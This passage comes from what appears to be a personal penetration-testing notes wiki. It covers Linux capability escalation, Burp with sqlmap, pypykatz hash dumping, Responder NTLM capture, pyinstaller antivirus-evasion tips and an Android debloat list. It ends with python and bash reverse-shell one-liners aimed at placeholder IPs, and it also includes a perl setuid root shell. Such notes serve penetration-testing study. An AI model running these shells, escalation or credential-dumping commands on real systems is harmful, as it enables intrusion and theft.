    getcap -r / 2>/dev/null\n

Check what each capability means at https://linux.die.net/man/7/capabilities.

Knowing which capability is assigned to a process, try to make the best of it to escalate privileges.

Example in HackTheBox: nunchucks, in which the perl binary has the \"cap_setuid+ep\" capability, meaning it can set its UID and effectively run as root.
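For that cap_setuid case, the classic GTFOBins-style escalation is a one-liner like the following sketch (it assumes perl really holds cap_setuid+ep):

# Set the UID to 0 and spawn a root shell\nperl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\";'\n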

    ","tags":["privilege escalation","linux"]},{"location":"process-capabilities-getcap/#labs","title":"Labs","text":"

    HackTheBox: nunchucks

    ","tags":["privilege escalation","linux"]},{"location":"process-capabilities-getcap/#resources","title":"Resources","text":"

    Hacktricks

    https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/

    ","tags":["privilege escalation","linux"]},{"location":"process-hacker-tool/","title":"Process Hacker tool","text":"","tags":["thick client application"]},{"location":"process-hacker-tool/#usage","title":"Usage","text":"

    In the course Pentesting thick clients applications.

    We will be using the portable version.

    1. Open the application you want to test.

    2. Open Process Hacker Tool.

3. Select the application, right-click on it and choose \"Properties\".

    4. Select tab \"Memory\".

    5. Click on \"Strings\".

    6. Check \"Image\" and \"Mapped\" and search!

    7. In the results you can use the Filter option to search for (in this case) \"data source\".

Other possible searches: \"Decrypt\". A clear-text connection string in memory reveals credentials: pwned!

    ","tags":["thick client application"]},{"location":"proxies/","title":"Proxies","text":"

    A proxy is when a device or service sits in the middle of a connection and acts as a mediator.

    • HTTP Proxies: BurpSuite
    • Postman, mitm_relay
• SOCKS/SSH Proxy (for pivoting): Chisel, ptunnel, sshuttle (see the sshuttle sketch below).
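As a quick illustration of SSH-based pivoting, a minimal sshuttle sketch (the SSH host IP and internal subnet are placeholders):

# Route all traffic for 172.16.0.0/16 through the compromised SSH host, like a lightweight VPN\nsshuttle -r user@10.10.10.10 172.16.0.0/16\n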

    There are many types of proxy services, but the key ones are:

• Dedicated Proxy/Forward Proxy: The Forward Proxy is what most people imagine a proxy to be. A Forward Proxy is when a client makes a request to a computer, and that computer carries out the request. For example, in a corporate network, sensitive computers may not have direct access to the Internet. To access a website, they must go through a proxy (or web filter).
• Reverse Proxy: As you may have guessed, a reverse proxy is the reverse of a Forward Proxy. Instead of being designed to filter outgoing requests, it filters incoming ones. The most common goal with a Reverse Proxy is to listen on an address and forward it to a closed-off network. Many organizations use CloudFlare as they have a robust network that can withstand most DDOS attacks.
    • Transparent Proxy
    "},{"location":"proxies/#setting-up-postman-with-burpsuite","title":"Setting up Postman with BurpSuite","text":"

    1 - Postman > Settings

    2 - Proxy tab. Check:

    • Use the system proxy
    • Add a custom proxy configuration
    • HTTP
    • HTTPS
    • 127.0.0.1
    • 8080

3 - BurpSuite. Set up the proxy listener

    4 - Burp Suite. Intercept mode on

    5 - Postman. Send the interesting request from your collection

    6 - Your BurpSuite will intercept that traffic. Now you can send it to Intruder, Repeater, Sequencer...

    "},{"location":"proxies/#setting-up-mitm_relay-with-burpsuite","title":"Setting up mitm_relay with Burpsuite","text":"

In DVTA we will configure the server to be the IP of the local machine. In my lab setup, my IP was 10.0.2.15.

In FTP, we will configure the listening port to 2111. We will also disable the IP check for this lab setup to work.

    From https://github.com/jrmdev/mitm_relay:

    This is what we're doing:

    1. DVTA application sends traffic to port 21, so to intercept it we configure MITM_relay to be listening on port 21.

2. mitm_relay encapsulates the application traffic (no matter the protocol) into HTTP so Burp Suite can read it.

3. Burp Suite will read the traffic, and here we can tamper with it.

4. mitm_relay will \"unfunnel\" the traffic from the HTTP protocol back into the raw one.

5. In a lab setup the FTP server will be on the same network, so to avoid conflicting with mitm_relay we will change the FTP listening port to 2111. In real life this change is not necessary.

    Running mitm_relay:

python mitm_relay.py -l 0.0.0.0 -r tcp:21:10.0.2.15:2111 -p 127.0.0.1:8080\n# -l listening address for mitm_relay (0.0.0.0 means we are listening on all interfaces)\n# -r relay configuration: <protocol>:<listeningPort>:<IPofDestinationserver>:<listeningPortonDestinationServer>\n# -p Proxy configuration: <IPofProxy>:<portOfProxy> \n

And this is what the interception looks like:

    "},{"location":"proxies/#burpsuite-sqlmap","title":"Burpsuite + sqlmap","text":""},{"location":"proxies/#from-burpsuite","title":"From Burpsuite","text":"

Browse the application to capture the request that generates the csrf token in your traffic.

    Open Settings, go to tab Session and scroll down to the section Macros.

    Click on \"Add\" (a macro.) You will see the already captured requests.

Select the request in which the csrf token is created/refreshed (and still not used) and click on OK.

    Name your macro in the window \"Macro Editor,\" for instance GET_csrf, and select \"Configure item\".

    Now you indicate to Burpsuite where the value of the CSRF is shown in the response. Don't forget to add the name of the parameter. Click on OK.

    Click on OK in the window \"Macro editor\".

    You are again in the Setting>Sessions section. Macro section is at the bottom of the page. Now we are going to configure the section \"Session handling rules\":

    Click on \"Add\" (a rule,) and the \"Session handling rule editor\" will open.

    • In Rule description write: PUT_CSRF
    • In Rule actions, click on \"Add > Run a macro.\"
    • New window will open for defining the action performed by the macro:
      • Select the macro GET_csrf.
      • Select the option \"Update only the following parameter,\" and add in there the name we used before when defining where the token was, \"csrf.\"
      • In the top menu, select the tab \"Scope,\" and add the url within scope.
• IMPORTANT: In Tools Scope, select the module \"Proxy.\" This will allow sqlmap requests to be routed.
    "},{"location":"proxies/#from-sqlmap","title":"From Sqlmap","text":"

    Create a file that contains the request that is vulnerable to SQLi and save it.

    Then:

sqlmap -r request.txt -p id --proxy=http://localhost:8080 --current-db --flush-session -vv \n

Important: The --proxy flag routes the request through Burpsuite.

For blind injections you need to specify other parameters, such as --risk and --level (see the sketch below).
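As a hedged example, a boolean-based blind run through the same Burp proxy with increased risk and level might look like this:

sqlmap -r request.txt -p id --proxy=http://localhost:8080 --level=5 --risk=3 --technique=B --batch\n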

    "},{"location":"pyftpdlib/","title":"pyftpdlib","text":"

    A simple FTP server written in python

    ","tags":["pentesting","windows","ftp server","python"]},{"location":"pyftpdlib/#installation","title":"Installation","text":"
    sudo pip3 install pyftpdlib\n
    ","tags":["pentesting","windows","ftp server","python"]},{"location":"pyftpdlib/#basic-usage","title":"Basic usage","text":"

By default pyftpdlib uses port 2121. Use the --port flag to indicate a different port. Anonymous authentication is enabled by default if we don't set a user and password.

    sudo python3 -m pyftpdlib --port 21\n

Use the --write option to allow clients to upload files to our attack host:

    sudo python3 -m pyftpdlib --port 21 --write\n
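To test the server from another Linux host, one option is mirroring the anonymous share with wget (the IP is a placeholder):

wget -m ftp://anonymous:anonymous@10.10.14.5\n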
    ","tags":["pentesting","windows","ftp server","python"]},{"location":"pyinstaller/","title":"Pyinstaller","text":"

    PyInstaller reads a Python script written by you. It analyzes your code to discover every other module and library your script needs in order to execute. Then it collects copies of all those files \u2013 including the active Python interpreter! \u2013 and puts them with your script in a single folder, or optionally in a single executable file.

    ","tags":["pentesting","python"]},{"location":"pyinstaller/#installation","title":"Installation","text":"
    pip install pyinstaller\n
    ","tags":["pentesting","python"]},{"location":"pyinstaller/#usage","title":"Usage","text":"
    pyinstaller /path/to/yourscript.py\n

But the real power of pyinstaller comes with one-file executable generation. Additionally, pyinstaller provides a flag to prevent a console window from opening.

    pyinstaller --onefile --windowed /path/to/yourscript.py\n

If the antivirus (signature-based) is able to catch the EXE even before opening it, then you need to change the packaging method, as that would change the signature of the exported EXE.

Pyinstaller uses UPX to compress the size of the EXE output. So it's worth trying with:

pyinstaller --onefile --windowed /path/to/yourscript.py --noupx\n\n# --noupx: Do not use UPX\n

Or even try other software to export to EXE.

If the antivirus (heuristic-based) catches your EXE after opening it, then you need to change the structure or the order of your source code:

    • Add some random delay.
    • Add some random operations like create a text file, append random text and then delete the file.
    • Change the order of doing things.
    • Offload some operations/commands to subprocess.

    Tips:

Never blindly rely on an antivirus sandbox VM (e.g. VMware) to test an EXE.

    ","tags":["pentesting","python"]},{"location":"pypykatz/","title":"pypykatz","text":"

Mimikatz implementation in pure Python. Runs on all OSes that support Python >= 3.6.

    ","tags":["windows","dump hashes","passwords"]},{"location":"pypykatz/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/skelsec/pypykatz.

    ","tags":["windows","dump hashes","passwords"]},{"location":"pypykatz/#basic-usage","title":"Basic usage","text":"
    pypykatz lsa minidump /home/path/lsass.dmp \n

From the results, as an example, we will get this snippet:

    sid S-1-5-21-4019466498-1700476312-3544718034-1001\nluid 1354633\n    == MSV ==\n        Username: bob\n        Domain: DESKTOP-33E7O54\n        LM: NA\n        NT: 64f12cddaa88057e06a81b54e73b949b\n        SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8\n        DPAPI: NA\n

    MSV is an authentication package in Windows that LSA calls on to validate logon attempts against the SAM database. Pypykatz extracted the SID, Username, Domain, and even the NT & SHA1 password hashes associated with the bob user account's logon session stored in LSASS process memory.

    But also, these others:

    • WDIGEST is an older authentication protocol enabled by default in Windows XP - Windows 8 and Windows Server 2003 - Windows Server 2012. LSASS caches credentials used by WDIGEST in clear-text.
    • Kerberos is a network authentication protocol used by Active Directory in Windows Domain environments. Domain user accounts are granted tickets upon authentication with Active Directory. LSASS caches passwords, ekeys, tickets, and pins associated with Kerberos. It is possible to extract these from LSASS process memory and use them to access other systems joined to the same domain.
    • DPAPI: The Data Protection Application Programming Interface or DPAPI is a set of APIs in Windows operating systems used to encrypt and decrypt DPAPI data blobs on a per-user basis for Windows OS features and various third-party applications. Here are just a few examples of applications that use DPAPI and what they use it for:
    Applications Use of DPAPI Internet Explorer Password form auto-completion data (username and password for saved sites). Google Chrome Password form auto-completion data (username and password for saved sites). Outlook Passwords for email accounts. Remote Desktop Connection Saved credentials for connections to remote machines. Credential Manager Saved credentials for accessing shared resources, joining Wireless networks, VPNs and more.

    Mimikatz and Pypykatz can extract the DPAPI masterkey for the logged-on user whose data is present in LSASS process memory. This masterkey can then be used to decrypt the secrets associated with each of the applications using DPAPI and result in the capturing of credentials for various accounts.

    ","tags":["windows","dump hashes","passwords"]},{"location":"rdesktop/","title":"rdesktop","text":"

    rdesktop is an open source UNIX client for connecting to Windows Remote Desktop Services, capable of natively speaking Remote Desktop Protocol (RDP) in order to present the user's Windows desktop.

    ","tags":["tools","windows","rdp"]},{"location":"rdesktop/#installation","title":"Installation","text":"

    Preinstalled in Kali.

    sudo apt-get install rdesktop\n
    ","tags":["tools","windows","rdp"]},{"location":"rdesktop/#basic-usage","title":"Basic usage","text":"
    rdesktop $ip\n\n# Mounting a Linux Folder Using rdesktop\nrdesktop $ip -d <domain> -u <username> -p <'Password0@'> -r disk:linux='/home/user/rdesktop/files'\n
    ","tags":["tools","windows","rdp"]},{"location":"regex/","title":"Mastering Regular Expressions - Regex","text":"

The system implementing regex functionality is often called a "regular expression engine". Basically, a regex engine tries to match the pattern against a given string. There are two main types of regex engines: DFA and NFA, also referred to as text-directed and regex-directed engines.

With the following metacharacters you can build complex patterns that can match a wide range of combinations.

Metacharacter Description . Any single character ^ Match the beginning of a line $ Match the end of a line a|b Match either a or b \\d Any digit \\D Any non-digit character \\w Any word character \\W Any non-word character \\s Any whitespace character \\S Any non-whitespace character \\b Matches a word boundary \\B Match must not occur on a \\b boundary. [\\b] Backspace character \\xYY Match hex character YY \\ddd Octal character ddd [] Start/close a character class () Start/close a character group \\ Escape special characters | It means OR {} Start/close repetitions of a character class

    Quantifiers

Regex Quantifier Description + + indicates that the preceding character must occur one or more times. ? ? indicates that the preceding character is optional. It means the preceding character can occur zero or one time. * Matches zero or more of the preceding character. {n} Matches exactly n occurrences of the preceding character. {n,} Matches n or more occurrences of the preceding character. {n,m} Matches between n and m occurrences of the preceding element

The following are common examples of character classes:

    • [abc] - matches any one character that is either 'a', 'b', or 'c'.
    • [a-z] - matches any one lowercase letter from 'a' to 'z'.
    • [A-Z] - matches any one upper case letter from 'A' to 'Z'.
• [0-9] - matches any one digit from '0' to '9'. Optionally, use the \\d metacharacter.
    • [^abc] - matches any one character that is not 'a', 'b', or 'c'.
    • [\\w] - matches any one-word character, including letters, digits, and underscore.
    • [\\s] - matches any whitespace character, including space, tab, and newline.
    • [^a-z] - matches any one character that is not a lowercase letter from 'a' to 'z'.

    In regex, any subpattern enclosed within the parentheses () is considered a group. For example,\u00a0(xyz)\u00a0creates a group that matches the exact sequence \"xyz\".
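Groups, classes and quantifiers combine naturally. For instance, a rough (unvalidated) IPv4 matcher with grep -E, just as an illustration:

# The group ([0-9]{1,3}\\.) repeats exactly three times, followed by a final octet\necho 10.10.14.5 | grep -E '^([0-9]{1,3}\\.){3}[0-9]{1,3}$'\n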

Non-printing character Description \\0 NULL byte. In many programming languages it marks the end of a string \\b Within a character class represents the backspace character, while outside \\b matches a word boundary \\t Tab key \\n New line \\v Vertical tabulation \\f Form feed \\r In HTTP the \\r\\n sequence is used as the end-of-line marker \\e Escape character"},{"location":"regex/#unicode","title":"Unicode","text":"

    Regular expression flavors that work with Unicode use specific meta-sequences to match code points:

    # `\\u`+code-point \n\ncode-point is the hexadecimal number of the character to match \n`\\u2603`\n\n# `\\x`{code-point} in the PCRE library in Apache and PHP\n{code-point} is the hexadecimal number of the character to match \n`\\x{2603}`\n
    "},{"location":"regshot/","title":"regshot","text":"

regshot helps you identify changes made to the Registry by a thick client application. It is used to compare the registry entries that have changed during an installation or a change in your system settings.

    "},{"location":"regshot/#installation","title":"Installation","text":"

    Download from: https://sourceforge.net/projects/regshot/

    "},{"location":"regshot/#usage","title":"Usage","text":"

    From the course Pentesting thick clients applications.

1. Run the regshot version that matches your thick app (x86 or x64).

    2. Click on \"First shot\". It will make a \"shot\" of the existing registry entries.

    3. Open the app you want to test and login into it.

    4. Perform some kind of action, like for instance, viewing the profile.

    5. Take a \"Second shot\" of the Registry entries.

    6. After that, you will see the button \"Compare\" enabled. Click on it.

    An HTML file will be generated and you will see the registry entries:

An interesting registry entry is \"isLoggedIn\", which has changed from false to true. This may be a potential attack vector (we could set it to true and also change the username to admin).

    HKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"false\"  \nHKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"true\"\n

    "},{"location":"remove-bloatware/","title":"Remove bloatware from android phones","text":"

    Android Debug Bridge - adb cheat sheet.

First of all, make sure you have enabled Developer mode on your mobile. Afterward, enable \"USB Debug mode\" (\"Depuración USB\" in Spanish).

    1. Connect mobile to computer with USB cable.

    2. Press \"File Transfer\" in mobile.

    3. In laptop, open a terminal and run:

    # Check if device is connected. \nadb devices\n

4. If the device is connected correctly, the mobile will prompt you to accept the computer connection.

    5. Access the device from terminal:

    adb shell\n

    Now you can uninstall packages.

    "},{"location":"remove-bloatware/#basic-commands","title":"Basic commands","text":"
    # Uninstall app\npm uninstall --user 0 app.package.name\n\n# Deactivate app\npm disable-user app.package.name\n
    "},{"location":"remove-bloatware/#list-of-xiaomi-trash","title":"List of xiaomi trash","text":"
• com.miui.analytics: Xiaomi analytics service.
• com.xiaomi.mipicks: app store. Occasionally it displays ads.
• com.miui.msa.global: MIUI ads and advertising service.
• com.miui.cloudservice | com.miui.cloudservice.sysbase | com.miui.newmidrive: Mi Cloud tools.
• com.miui.cloudbackup: Mi Cloud Backup cloud backup tool.
• com.miui.backup: MIUI backup tool.
• com.xiaomi.glgm: Xiaomi games tool.
• com.xiaomi.payment | com.mipay.wallet.in: Xiaomi mobile payment tools.
• com.tencent.soter.soterserver: mobile payment feature for WeChat and other services popular in China.
• cn.wps.xiaomi.abroad.lite: Mi DocViewer, PDF document viewing tool.
• com.miui.videoplayer: Mi Video player.
• com.miui.player: Mi Music player.
• com.mi.globalbrowser: Mi Browser.
• com.mi.midrop: ShareMe tool for sharing files with other Xiaomi devices.
• com.miui.yellowpage: Mi YellowPages, phone anti-spam protection system.
• com.miui.android.fashiongallery: wallpaper carousel.
• com.miui.bugreport | com.miui.miservice: tools for reporting MIUI bugs.
• com.miui.weather2: Xiaomi weather app.
• com.xiaomi.joyose: analytics and advertising tools.
• com.zhiliaoapp.musically: TikTok.
• com.facebook.katana: Facebook app.
• com.facebook.services: Facebook services.
• com.facebook.system: Facebook app installer.
• com.facebook.appmanager: Facebook application manager.
• com.ebay.mobile | com.ebay.carrier: eBay app.
• com.alibaba.aliexpresshd: AliExpress app.

More suggestions for removing bloatware in this repo: xiaomi_debloat.sh

    pm uninstall --user 0 com.android.inputmethod.latin\npm uninstall --user 0 com.android.camera2\npm uninstall --user 0 com.android.providers.partnerbookmarks\npm uninstall --user 0 com.android.emergency\npm uninstall --user 0 com.android.printspooler\npm uninstall --user 0 com.android.apps.tag\npm uninstall --user 0 com.android.dreams.basic\npm uninstall --user 0 com.android.dreams.phototable\npm uninstall --user 0 com.android.magicsmoke\npm uninstall --user 0 com.android.managedprovisioning\npm uninstall --user 0 com.android.noisefield\npm uninstall --user 0 com.android.phasebeam\npm uninstall --user 0 com.android.wallpaper.holospiral\npm uninstall --user 0 com.android.stk\npm uninstall --user 0 com.android.bluetoothmidiservice\npm uninstall --user 0 com.android.browser\npm uninstall --user 0 com.android.cellbroadcastreciever\npm uninstall --user 0 com.android.hotwordenrollment.okgoogle\npm uninstall --user 0 com.android.printservice.recommendation\npm uninstall --user 0 com.android.quicksearchbox\npm uninstall --user 0 com.android.email\npm uninstall --user 0 com.android.bips\npm uninstall --user 0 com.android.hotwordenrollment.xgoogle\npm uninstall --user 0 com.android.chrome\npm uninstall --user 0 com.android.webview\npm uninstall --user 0 com.android.calendar\npm uninstall --user 0 com.android.providers.calendar\npm uninstall --user 0 android.romstats\npm uninstall --user 0 com.android.documentsui\npm uninstall --user 0 com.android.globalFileexplorer\npm uninstall --user 0 com.android.midrive\npm uninstall --user 0 com.android.calculator2\npm uninstall --user 0 com.android.soundrecorder\npm uninstall --user 0 com.android.musicfx\npm uninstall --user 0 com.android.bookmarkprovider\npm uninstall --user 0 com.android.gallery3d\npm uninstall --user 0 com.android.calllogbackup\npm uninstall --user 0 com.android.traceur\npm uninstall --user 0 com.sec.android.AutoPreconfig\npm uninstall --user 0 com.sec.android.service.health\n\n\n# Google apps:\npm uninstall --user 0 com.google.android.tts\npm uninstall --user 0 com.google.android.apps.googleassistant\npm uninstall --user 0 com.google.android.apps.setupwizard.searchselector\npm uninstall --user 0 com.google.android.pixel.setupwizard\npm uninstall --user 0 com.google.android.gm\npm uninstall --user 0 com.google.android.calendar\npm uninstall --user 0 com.google.android.calculator\npm uninstall --user 0 com.google.android.apps.recorder\npm uninstall --user 0 com.google.android.printservice.recommendation\npm uninstall --user 0 com.google.android.apps.books\npm uninstall --user 0 com.google.android.apps.cloudprint\npm uninstall --user 0 com.google.android.apps.currents\npm uninstall --user 0 com.google.android.apps.fitness\npm uninstall --user 0 com.google.android.apps.photos\npm uninstall --user 0 com.google.android.apps.plus\npm uninstall --user 0 com.google.android.apps.tachyon\npm uninstall --user 0 com.google.android.music\npm uninstall --user 0 com.google.android.apps.wellbeing\npm uninstall --user 0 com.google.android.email\npm uninstall --user 0 com.google.android.googlequicksearchbox\npm uninstall --user 0 com.google.android.talk\npm uninstall --user 0 com.google.android.syncadapters.contacts\npm uninstall --user 0 com.google.android.videos\npm uninstall --user 0 com.google.tango.measure\npm uninstall --user 0 com.google.android.youtube\npm uninstall --user 0 com.google.android.apps.docs\npm uninstall --user 0 com.google.ar.lens\npm uninstall --user 0 com.google.android.apps.restore\npm uninstall --user 0 
com.google.android.soundpicker\npm uninstall --user 0 com.google.android.syncadapters.calendar\npm uninstall --user 0 com.google.ar.core\npm uninstall --user 0 com.google.android.setupwizard\npm uninstall --user 0 com.google.android.apps.wallpaper\npm uninstall --user 0 com.google.android.projection.gearhead\npm uninstall --user 0 com.google.android.marvin.talkback\npm uninstall --user 0 com.google.android.inputmethod.latin\n\n\n#Xiaomi/MIUI/Baidu stuff:\n\npm uninstall --user 0 com.mi.health\npm uninstall --user 0 com.miui.zman\npm uninstall --user 0 com.miui.freeform\npm uninstall --user 0 com.miui.miwallpaper.earth\npm uninstall --user 0 com.miui.miwallpaper.mars\npm uninstall --user 0 com.miui.newmidrive\npm uninstall --user 0 cn.wps.xiaomi.abroad.lite\npm uninstall --user 0 com.miui.miservice\npm uninstall --user 0 com.xiaomi.mi_connect_service\npm uninstall --user 0 com.xiaomi.miplay_client\npm uninstall --user 0 com.miui.mishare.connectivity\npm uninstall --user 0 com.miui.huanji\npm uninstall --user 0 com.miui.misound\npm uninstall --user 0 com.xiaomi.mirecycle\npm uninstall --user 0 com.miui.cloudbackup\npm uninstall --user 0 com.miui.backup\npm uninstall --user 0 com.mfashiongallery.emag\npm uninstall --user 0 com.miui.accessibility\npm uninstall --user 0 com.xiaomi.account\npm uninstall --user 0 com.xiaomi.xmsf\npm uninstall --user 0 com.xiaomi.simactivate.service\npm uninstall --user 0 com.miui.daemon\npm uninstall --user 0 com.miui.cloudservice.sysbase\npm uninstall --user 0 com.mi.webkit.core\npm uninstall --user 0 com.sohu.inputmethod.sogou.xiaomi\npm uninstall --user 0 com.miui.notes\npm uninstall --user 0 com.bsp.catchlog\npm uninstall --user 0 com.miui.vsimcore\npm uninstall --user 0 com.xiaomi.scanner\npm uninstall --user 0 com.miui.greenguard\npm uninstall --user 0 com.miui.android.fashiongallery\npm uninstall --user 0 com.miui.cloudservice\npm uninstall --user 0 com.miui.micloudsync\npm uninstall --user 0 com.miui.enbbs\npm uninstall --user 0 com.mi.android.globalpersonalassistant\npm uninstall --user 0 com.mi.globalTrendNews\npm uninstall --user 0 com.milink.service\npm uninstall --user 0 com.mipay.wallet.id\npm uninstall --user 0 com.mipay.wallet.in\npm uninstall --user 0 com.miui.analytics\npm uninstall --user 0 com.miui.bugreport\npm uninstall --user 0 com.miui.cleanmaster\npm uninstall --user 0 com.miui.hybrid.accessory\npm uninstall --user 0 com.miui.miwallpaper\npm uninstall --user 0 com.miui.msa.global\npm uninstall --user 0 com.miui.touchassistant\npm uninstall --user 0 com.miui.translation.kingsoft\npm uninstall --user 0 com.miui.translation.xmcloud\npm uninstall --user 0 com.miui.translation.youdao\npm uninstall --user 0 com.miui.translationservice\npm uninstall --user 0 com.miui.userguide\npm uninstall --user 0 com.miui.virtualsim\npm uninstall --user 0 com.miui.yellowpage\npm uninstall --user 0 com.miui.videoplayer\npm uninstall --user 0 com.miui.weather2\npm uninstall --user 0 com.miui.player\npm uninstall --user 0 com.miui.screenrecorder\npm uninstall --user 0 com.miui.providers.weather\npm uninstall --user 0 com.miui.compass\npm uninstall --user 0 com.miui.calculator\npm uninstall --user 0 com.xiaomi.vipaccount\npm uninstall --user 0 com.xiaomi.channel\npm uninstall --user 0 com.mipay.wallet\npm uninstall --user 0 com.xiaomi.pass\npm uninstall --user 0 com.xiaomi.shop\npm uninstall --user 0 com.xiaomi.joyose\npm uninstall --user 0 com.xiaomi.providers.appindex\npm uninstall --user 0 com.miui.fm\npm uninstall --user 0 com.mi.liveassistant\npm uninstall 
--user 0 com.xiaomi.gamecenter.sdk.service\npm uninstall --user 0 com.xiaomi.payment\npm uninstall --user 0 com.baidu.input_mi\npm uninstall --user 0 com.xiaomi.ab\npm uninstall --user 0 com.xiaomi.jr\npm uninstall --user 0 com.baidu.duersdk.opensdk\npm uninstall --user 0 com.miui.hybrid\npm uninstall --user 0 com.baidu.searchbox\npm uninstall --user 0 com.xiaomi.glgm\npm uninstall --user 0 com.xiaomi.midrop\npm uninstall --user 0 com.xiaomi.mipicks\npm uninstall --user 0 com.miui.personalassistant\npm uninstall --user 0 com.miui.audioeffect\npm uninstall --user 0 com.miui.cit\npm uninstall --user 0 com.miui.qr\npm uninstall --user 0 com.miui.nextpay\npm uninstall --user 0 com.xiaomi.o2o\n\n\n#Xiaomi.eu:\npm uninstall --user 0 pl.zdunex25.updater\n\n\n#RevolutionOS: (not well tested)\npm uninstall --user 0 ros.ota.updater\n\n#SyberiaOS: (not well tested)\npm uninstall --user 0 com.syberia.ota\npm uninstall --user 0 com.syberia.SyberiaPapers\n\n\n#LineageOS: (not well tested)\npm uninstall --user 0 org.lineageos.recorder\npm uninstall --user 0 org.lineageos.snap\n\n\n#Paranoid Android:\npm uninstall --user 0 com.hampusolsson.abstruct\npm uninstall --user 0 code.name.monkey.retromusic\n\n#Other stuff:\npm uninstall --user 0 com.autonavi.minimap\npm uninstall --user 0 com.caf.fmradio\npm uninstall --user 0 com.opera.preinstall\npm uninstall --user 0 com.qualcomm.qti.perfdump\npm uninstall --user 0 com.duokan.phone.remotecontroller\npm uninstall --user 0 com.samsung.aasaservice\npm uninstall --user 0 org.simalliance.openmobileapi.service\npm uninstall --user 0 com.duokan.phone.remotecontroller.peel.plugin\npm uninstall --user 0 com.facemoji.lite.xiaomi\npm uninstall --user 0 com.facebook.appmanager\npm uninstall --user 0 com.facebook.katana\npm uninstall --user 0 com.facebook.services\npm uninstall --user 0 com.facebook.system\npm uninstall --user 0 com.netflix.partner.activation\n\n\n# !EXPERIMENTAL STUFF!\n\n\n#GPS & Location debloat\n#Uninstalling these may break apps like Waze.\n#You have been warned.\npm uninstall --user 0 com.android.location.fused\npm uninstall --user 0 org.codeaurora.gps.gpslogsave\npm uninstall --user 0 com.google.android.gms.location.history\npm uninstall --user 0 com.qualcomm.location\npm uninstall --user 0 com.xiaomi.bsp.gps.nps\npm uninstall --user 0 com.xiaomi.location.fused\n\n\n#Use this if you don't like the stock MIUI launcher.\n#Uninstalling this without basic setup and an alternative launcher will make the device unstable or softbricked.\n#You can't downgrade to a lower version of MIUI launcher after uninstalling this.\n#You have been warned.\npm uninstall --user 0 com.miui.home\n\n\n#Always-on Display removal\n#Not recommended, and not well-tested in daily usage\n#You have been warned.\npm uninstall --user 0 com.miui.aod\n
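These pm uninstall commands are run inside an adb shell on the device. A minimal sketch for applying them in bulk from the host, assuming adb is connected and authorized and that the package names have been saved one per line in a hypothetical packages.txt:

# Requires USB debugging enabled and an authorized adb connection.
# packages.txt (hypothetical filename) holds one package name per line.
while read -r pkg; do
    adb shell pm uninstall --user 0 "$pkg"
done < packages.txt

Note that pm uninstall --user 0 only removes the app for the main user, so a factory reset will restore everything.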
    "},{"location":"responder/","title":"Responder.py - A SMB server to listen to NTLM hashes","text":"

Responder is an LLMNR, NBT-NS and mDNS poisoner, with a built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Responder can perform many different kinds of attacks. For instance, we may set up a malicious SMB server. When the target machine attempts NTLM authentication against that server, Responder sends back a challenge for the client to encrypt with the user's password hash. When the client responds, Responder uses the challenge and the encrypted response to generate the NetNTLMv2 hash. While we can't reverse the NetNTLMv2 hash, we can try many common passwords to see if any of them produce the same challenge-response; if one does, we know that is the password. We can use John the Ripper or hashcat for this.

    ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"responder/#installation","title":"Installation","text":"
    git clone https://github.com/lgandx/Responder.git\ncd Responder \nsudo pip install -r requirements.txt\n
    ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"responder/#basic-usage","title":"Basic usage","text":"
    ./Responder.py -I [interface] -w -d\n# -I: Set interface \n# -w: Start the WPAD rogue proxy server. Default value is False\n# -d: Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False\n\n# In the HTB machine responder:\n./Responder.py -I tun0 -w -d\n

All saved hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using hashcat module 5600.
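A sketch of the cracking step, assuming the captured hash was saved to a file named hash.txt (a hypothetical name):

# NetNTLMv2 with hashcat (mode 5600)
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

# Or with John the Ripper
john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt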

Note: if you notice multiple hashes for one account, this is because NTLMv2 utilizes both a client-side and a server-side challenge that is randomized for each interaction. The resulting hashes are therefore salted with a randomized string, which is why the hashes don't match even though they represent the same password.

    ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"responder/#practical-example","title":"Practical example","text":"

    HackTheBox machine: Responder.

    ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"reverse-shells/","title":"Reverse shells","text":"Resources to generate reverse shells
    • https://www.revshells.com/
    • Netcat for windows 32/64 bit
    • Pentesmonkey
    • PayloadsAllTheThings
    Other resources

    See web shells

All about shells:
• Reverse shell: Initiates a connection back to a "listener" on our attack box.
• Bind shell: "Binds" to a specific port on the target host and waits for a connection from our attack box.
• Web shell: Runs operating system commands via the web browser; typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a PHP script to run a single command).

Victim's machine: initiates a connection back to a "listener" on our attacking machine.

For this attack to work, we first set up the listener on the attacking machine using netcat.

    nc -lnvp 1234\n

    After that, on the victim's machine, you can launch the reverse shell connection.

    A Reverse Shell is handy when we want to get a quick, reliable connection to our compromised host. However, a Reverse Shell can be very fragile. Once the reverse shell command is stopped, or if we lose our connection for any reason, we would have to use the initial exploit to execute the reverse shell command again to regain our access.

    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#reverse-shell-connections","title":"Reverse shell connections","text":"","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#python","title":"python","text":"
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#bash","title":"bash","text":"
    bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'\n
